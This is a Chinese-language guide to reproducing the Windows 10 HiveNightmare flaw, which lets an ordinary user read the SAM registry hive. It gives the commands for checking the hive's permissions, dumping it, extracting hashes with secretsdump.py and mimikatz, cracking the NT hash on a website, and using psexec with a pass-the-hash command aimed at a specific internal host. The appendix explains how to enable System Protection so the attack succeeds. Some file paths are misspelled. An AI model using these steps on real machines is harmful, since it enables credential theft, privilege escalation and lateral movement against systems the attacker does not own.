0x01 漏洞介绍
Windows 10 中允许以非管理员用户身份检索所有注册表配置单元。例如,这包括 SAM 中的哈希值,可用于以 SYSTEM 身份执行代码
0x02 漏洞利用前提
适用于所有受支持的 Windows 10 版本,其中启用了系统保护(在大多数配置中应默认启用)。
0x03 工具
提权工具:https://github.com/GossiTheDog/HiveNightmare
横向移动工具:https://github.com/SecureAuthCorp/impacket
mimikatz:https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210721/mimikatz_trunk.7z
0x04 漏洞复现
一、检查是否易受攻击
icacls C:\windows\system32\config\sam
如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受攻击。
如果输出 Access is denied 或拒绝访问表示该系统不易受攻击。
二、通过HiveNightmare.exe导出sam hash进行提权
1.查看当前用户
运行exp,运行完成后会在桌面上生成三个文件
查看转存下的文件
2.解密凭证
将文件放到本地使用secretsdump.py进行解密,成功获取主机的hash
python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL
3.解密nthash
使用CMD5网站将nthash进行解密,成功获取明文密码
4.横向移动
使用获取的hash进行横向移动
psexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 administrator@10.108.3.77
psexec乱码解决办法chcp 65001
三、通过mimkiatz导出sam hash进行提权
1.查看用户属性
普通账号下运行mimikatz并执行查看所有用户的属性
2.导出shadowcopy volume
mimikatz # misc::shadowcopies
3.读取密码
mimikatz# lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskvolumeShadowcopy2\widows\system2\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskvolumeShadowcopy2\windows\system32\config\SAM
附录
如果提示以下错误,可能是未开启系统保护(在大多数配置中应默认启用)
开启系统保护的方法
1.点击配置
2.点击配置,选择"启用系统保护"
3.点击"创建"
4.输入还原点的描述(随便输入即可)
5.等待创建完成
提示成功创建
